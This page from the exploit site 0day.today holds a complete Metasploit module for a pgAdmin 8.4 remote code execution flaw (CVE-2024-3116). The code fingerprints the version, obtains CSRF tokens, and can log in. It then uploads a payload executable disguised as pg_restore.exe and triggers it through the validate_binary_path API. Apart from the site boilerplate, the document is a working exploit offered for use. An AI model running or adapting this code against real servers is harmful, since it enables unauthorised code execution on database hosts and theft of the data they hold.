0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
pgAdmin 8.4 Remote Code Execution Exploit
Author
Risk
[
Security Risk Critical
]0day-ID
Category
Date add
CVE
Platform
## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking prepend Msf::Exploit::Remote::AutoCheck include Msf::Exploit::Remote::HttpClient include Msf::Exploit::FileDropper include Msf::Exploit::EXE def initialize(info = {}) super( update_info( info, 'Name' => 'pgAdmin Binary Path API RCE', 'Description' => %q{ pgAdmin <= 8.4 is affected by a Remote Code Execution (RCE) vulnerability through the validate binary path API. This vulnerability allows attackers to execute arbitrary code on the server hosting PGAdmin, posing a severe risk to the database management system's integrity and the security of the underlying data. Tested on pgAdmin 8.4 on Windows 10 both authenticated and unauthenticated. }, 'License' => MSF_LICENSE, 'Author' => [ 'M.Selim Karahan', # metasploit module 'Mustafa Mutlu', # lab prep. and QA 'Ayoub Mokhtar' # vulnerability discovery and write up ], 'References' => [ [ 'CVE', '2024-3116'], [ 'URL', 'https://ayoubmokhtar.com/post/remote_code_execution_pgadmin_8.4-cve-2024-3116/'], [ 'URL', 'https://www.vicarius.io/vsociety/posts/remote-code-execution-vulnerability-in-pgadmin-cve-2024-3116'] ], 'Platform' => ['windows'], 'Arch' => ARCH_X64, 'Targets' => [ [ 'Automatic Target', {}] ], 'DisclosureDate' => '2024-03-28', 'DefaultTarget' => 0, 'Notes' => { 'Stability' => [ CRASH_SAFE, ], 'Reliability' => [ REPEATABLE_SESSION, ], 'SideEffects' => [ ARTIFACTS_ON_DISK, CONFIG_CHANGES, IOC_IN_LOGS, ] } ) ) register_options( [ Opt::RPORT(8000), OptString.new('USERNAME', [ false, 'User to login with', '']), OptString.new('PASSWORD', [ false, 'Password to login with', '']), OptString.new('TARGETURI', [ true, 'The URI of the Example Application', '/']) ] ) end def check version = get_version return CheckCode::Unknown('Unable to determine the target version') unless version return CheckCode::Safe("pgAdmin version #{version} is not affected") if version >= Rex::Version.new('8.5') CheckCode::Vulnerable("pgAdmin version #{version} is affected") end def set_csrf_token_from_login_page(res) if res&.code == 200 && res.body =~ /csrfToken": "([\w+.-]+)"/ @csrf_token = Regexp.last_match(1) # at some point between v7.0 and 7.7 the token format changed elsif (element = res.get_html_document.xpath("//input[@id='csrf_token']")&.first) @csrf_token = element['value'] end end def set_csrf_token_from_config(res) if res&.code == 200 && res.body =~ /csrfToken": "([\w+.-]+)"/ @csrf_token = Regexp.last_match(1) # at some point between v7.0 and 7.7 the token format changed else @csrf_token = res.body.scan(/pgAdmin\['csrf_token'\]\s*=\s*'([^']+)'/)&.flatten&.first end end def auth_required? res = send_request_cgi('uri' => normalize_uri(target_uri.path), 'keep_cookies' => true) if res&.code == 302 && res.headers['Location']['login'] true elsif res&.code == 302 && res.headers['Location']['browser'] false end end def on_windows? res = send_request_cgi('uri' => normalize_uri(target_uri.path, 'browser/js/utils.js'), 'keep_cookies' => true) if res&.code == 200 platform = res.body.scan(/pgAdmin\['platform'\]\s*=\s*'([^']+)';/)&.flatten&.first return platform == 'win32' end end def get_version if auth_required? res = send_request_cgi('uri' => normalize_uri(target_uri.path, 'login'), 'keep_cookies' => true) else res = send_request_cgi('uri' => normalize_uri(target_uri.path, 'browser/'), 'keep_cookies' => true) end html_document = res&.get_html_document return unless html_document && html_document.xpath('//title').text == 'pgAdmin 4' # there's multiple links in the HTML that expose the version number in the [X]XYYZZ, # see: https://github.com/pgadmin-org/pgadmin4/blob/053b1e3d693db987d1c947e1cb34daf842e387b7/web/version.py#L27 versioned_link = html_document.xpath('//link').find { |link| link['href'] =~ /\?ver=(\d?\d)(\d\d)(\d\d)/ } return unless versioned_link Rex::Version.new("#{Regexp.last_match(1).to_i}.#{Regexp.last_match(2).to_i}.#{Regexp.last_match(3).to_i}") end def csrf_token return @csrf_token if @csrf_token if auth_required? res = send_request_cgi('uri' => normalize_uri(target_uri.path, 'login'), 'keep_cookies' => true) set_csrf_token_from_login_page(res) else res = send_request_cgi('uri' => normalize_uri(target_uri.path, 'browser/js/utils.js'), 'keep_cookies' => true) set_csrf_token_from_config(res) end fail_with(Failure::UnexpectedReply, 'Failed to obtain the CSRF token') unless @csrf_token @csrf_token end def exploit if auth_required? && !(datastore['USERNAME'].present? && datastore['PASSWORD'].present?) fail_with(Failure::BadConfig, 'The application requires authentication, please provide valid credentials') end if auth_required? res = send_request_cgi({ 'uri' => normalize_uri(target_uri.path, 'authenticate/login'), 'method' => 'POST', 'keep_cookies' => true, 'vars_post' => { 'csrf_token' => csrf_token, 'email' => datastore['USERNAME'], 'password' => datastore['PASSWORD'], 'language' => 'en', 'internal_button' => 'Login' } }) unless res&.code == 302 && res.headers['Location'] != normalize_uri(target_uri.path, 'login') fail_with(Failure::NoAccess, 'Failed to authenticate to pgAdmin') end print_status('Successfully authenticated to pgAdmin') end unless on_windows? fail_with(Failure::BadConfig, 'This exploit is specific to Windows targets!') end file_name = 'pg_restore.exe' file_manager_upload_and_trigger(file_name, generate_payload_exe) rescue ::Rex::ConnectionError fail_with(Failure::Unreachable, "#{peer} - Could not connect to the web service") end # file manager code is copied from pgadmin_session_deserialization module def file_manager_init res = send_request_cgi({ 'uri' => normalize_uri(target_uri.path, 'file_manager/init'), 'method' => 'POST', 'keep_cookies' => true, 'ctype' => 'application/json', 'headers' => { 'X-pgA-CSRFToken' => csrf_token }, 'data' => { 'dialog_type' => 'storage_dialog', 'supported_types' => ['sql', 'csv', 'json', '*'], 'dialog_title' => 'Storage Manager' }.to_json }) unless res&.code == 200 && (trans_id = res.get_json_document.dig('data', 'transId')) && (home_folder = res.get_json_document.dig('data', 'options', 'homedir')) fail_with(Failure::UnexpectedReply, 'Failed to initialize a file manager transaction Id or home folder') end return trans_id, home_folder end def file_manager_upload_and_trigger(file_path, file_contents) trans_id, home_folder = file_manager_init form = Rex::MIME::Message.new form.add_part( file_contents, 'application/octet-stream', 'binary', "form-data; name=\"newfile\"; filename=\"#{file_path}\"" ) form.add_part('add', nil, nil, 'form-data; name="mode"') form.add_part(home_folder, nil, nil, 'form-data; name="currentpath"') form.add_part('my_storage', nil, nil, 'form-data; name="storage_folder"') res = send_request_cgi({ 'uri' => normalize_uri(target_uri.path, "/file_manager/filemanager/#{trans_id}/"), 'method' => 'POST', 'keep_cookies' => true, 'ctype' => "multipart/form-data; boundary=#{form.bound}", 'headers' => { 'X-pgA-CSRFToken' => csrf_token }, 'data' => form.to_s }) unless res&.code == 200 && res.get_json_document['success'] == 1 fail_with(Failure::UnexpectedReply, 'Failed to upload file contents') end upload_path = res.get_json_document.dig('data', 'result', 'Name') register_file_for_cleanup(upload_path) print_status("Payload uploaded to: #{upload_path}") send_request_cgi({ 'uri' => normalize_uri(target_uri.path, '/misc/validate_binary_path'), 'method' => 'POST', 'keep_cookies' => true, 'ctype' => 'application/json', 'headers' => { 'X-pgA-CSRFToken' => csrf_token }, 'data' => { 'utility_path' => upload_path[0..upload_path.size - 16] }.to_json }) true end end # 0day.today [2024-09-19] #